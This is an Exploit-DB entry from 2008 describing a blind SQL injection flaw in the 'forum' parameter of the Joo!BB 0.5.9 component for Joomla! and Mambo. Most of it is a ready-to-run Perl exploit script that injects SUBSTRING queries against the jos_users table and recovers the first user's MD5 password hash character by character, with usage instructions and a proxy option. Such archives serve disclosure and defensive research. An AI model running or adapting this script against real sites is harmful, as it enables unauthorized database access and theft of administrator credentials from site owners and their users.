Joomla! and Mambo Joo!BB 0.5.9 Component - 'forum' Parameter SQL Injection Vulnerability

2008-06-02T00:00:00
ID EDB-ID:31870
Type exploitdb
Reporter His0k4
Modified 2008-06-02T00:00:00

Description

Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/29475/info

The Joo!BB component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Joo!BB 0.5.9 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                
\n";
  print "   
#############################################################\n";
  print "   #   Joomla Component Joo!BB Blind SQL Injection Exploit     
#\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                         
#\n";
  print "   #                                                           
#\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                       
#\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                 
#\n";
  print "   #   Greetz2:  http://www.palcastle.org/cc :)                
#\n";
  print "   #                                                           
#\n";
  print "   #   Usage:   perl jobb.pl host path <options>               
#\n";
  print "   #   Example: perl jobb.pl www.host.com /joomla/ -f 1        
#\n";
  print "   #                                                           
#\n";
  print "   #   Options:                                                
#\n";
  print "   #     -f    Forum  id                                       
#\n";
  print "   #   Note:                                                   
#\n";
  print "   #   If you need to change the match value so do it :D       
#\n";
  print "   
#############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $fid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"f"})
{
  $fid = $options{"f"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $fid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $fid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $fid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = 
"http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." 
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 
),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Announcements";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}